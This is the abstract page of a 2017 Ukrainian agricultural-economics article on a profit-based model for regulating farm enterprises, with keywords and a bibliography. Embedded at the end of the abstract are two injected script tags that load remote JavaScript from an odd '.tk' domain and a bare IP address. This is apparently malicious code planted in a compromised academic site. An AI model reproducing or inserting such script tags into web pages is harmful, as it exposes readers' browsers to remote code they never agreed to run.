ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 65.012.123:631.11
Управління та інформаційне забезпечення

Ефективність інформаційно-аналітичної моделі регулювання господарської діяльності сільськогосподарських підприємств / // Економіка АПК. - 2017. - № 10 - С. 64

Мета статті - розробити інформаційно-аналітичну модель регулювання господарської діяльності сільськогосподарського підприємства для забезпечення ефективного управління, прийняття науково обґрунтованих управлінських рішень. Дослідження з регулювання господарської діяльності сільськогосподарських підприємств у ринкових умовах ґрунтується на припущенні, що системі виробничих чинників, таких як праця, земля, капітал відповідає певна величина прибутку від реалізації продукції. Запропонована інформаційно-аналітична модель регулювання господарської діяльності сільськогосподарського підприємства за величиною прибутку від реалізації продукції є математичною системою рівнянь, розв’язання якої дає змогу знайти узгодженість між обсягом виробництва, реалізації певної продукції, оплатою праці працівників, площею землі, яка використовується при виробництві продукції, повною собівартістю та величиною прибутку від реалізації продукції. Наукова новизна полягає у запропонованому системному підході до здійснення регулювання господарської діяльності сільськогосподарського підприємства за величиною прибутку від реалізації продукції на основі розробленої інформаційно-аналітичної моделі, яка передбачає встановлення взаємозв’язку між величиною прибутку й трудовими, земельними, фінансовими ресурсами. Запропонований аналітичний механізм у забезпеченні ефективного регулювання господарської діяльності сільськогосподарських підприємств дає змогу визначати раціональні діапазони у зміні трудових, земельних, фінансових ресурсів, задіяних у виробництві та реалізації продукції, встановити їх ефективність, приймати науково обґрунтовані управлінські рішення, здійснювати ефективне управління сільськогосподарськими підприємствами. Табл.: 1. Бібліогр.: 14.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: управління, сільськогосподарські підприємства, господарське регулювання, ресурси, продукція, прибуток, модель розвитку

Список використаних джерел

 1. Малік М.Й. Конкурентоспроможність аграрних підприємств: методологія і механізми: моногр. / М.Й. Малік, О.А. Нужна. - К. : ННЦ ІАЕ, 2007. - 270 с.
 2. Метод Крамера для СЛАР. [Електронний ресурс]. - Режим доступу: http://yukhym.com/uk/sistemi-linijnikh-rivnyan/sistemi-linijnikh-rivnyan-metod-kramera.html
 3. Організаційно-економічні основи управління прибутком сільськогосподарських підприємств : моногр. / В.М. Жмайлов, О.Г. Жмайлова, О.О. Бабицька, Ю.І. Данько, Л.В. Слюсарева - Суми : СНАУ, 2014. - 408 с.
 4. Основні економічні показники виробництва продукції сільського господарства в сільськогосподарських підприємствах за 2012 рік / Стат. бюл. відповід. за вип. О.М. Прокопенко, Державна служба статистики України. - К., 2013. - 88 с.
 5. Охріменко І.В. Витрати та собівартість сільськогосподарської продукції в регулюванні економічних відносин сільськогосподарських підприємств : моногр. / І.В. Охріменко - К. : ННЦ ІАЕ, 2009. - 360 с.
 6. Павлик В.П. Методи управління сільськогосподарським підприємством : моногр. / В.П. Павлик - К. : ННЦ ІАЕ, 2011. - 156 с.
 7. Павлик В.П. Удосконалення методичного інструментарію складання та реалізації господарських планів сільськогосподарських підприємств / В.П. Павлик // Економіка АПК. - 2016. -№ 12. - С. 58 - 64.
 8. Поліщук Н.В. Результативність діяльності субєктів господарювання: сутність, оцінка, основи регулювання : моногр. / Н.В. Поліщук. - К. : КНТЕУ, 2005. - 252 с.
 9. Регулювання розвитку аграрного виробництва в регіоні: моногр. / А.Г. Мазур [та ін.]; Вінницький. держ. аграр. ун-т. - Вінниця : Вінницька газета, 2009. - 188 с.
 10. Риггс Дж. Производственные системы: планирование, анализ, контроль. Сокращ. пер. с англ.; общ. ред. и послесловие А.И. Анчишкина / Дж. Риггс. - М. : Прогресс, 1972. - 344 с.
 11. Anderson Jock R. Agricultural decision analysis The Iowa State University Press / Jock R. Anderson, John L. Dillon and J. Brian Hardaker AMES, IOWA, U.S.A. 1977. - 344 p.
 12. Breimyer Harold F. Economics of the Product Markets of Agriculture. / Harold F. Breimyer. - Ames ; Iowa : Iowa State University Press, 1976. - 208 p.
 13. Castle Emery N. Farm business management : the decision making process / E/N. Castle, M.H. Backer &amp; F.J. Smith. - 2. ed. - New York ; London, 1972 - 340 p.
 14. Lloyd L. Byars Strategy in a Changing Environment / B. L. Lloyd, R.W. Leslie, Z. A. Shaker. Irwin Book Team, 1996. - 366 p.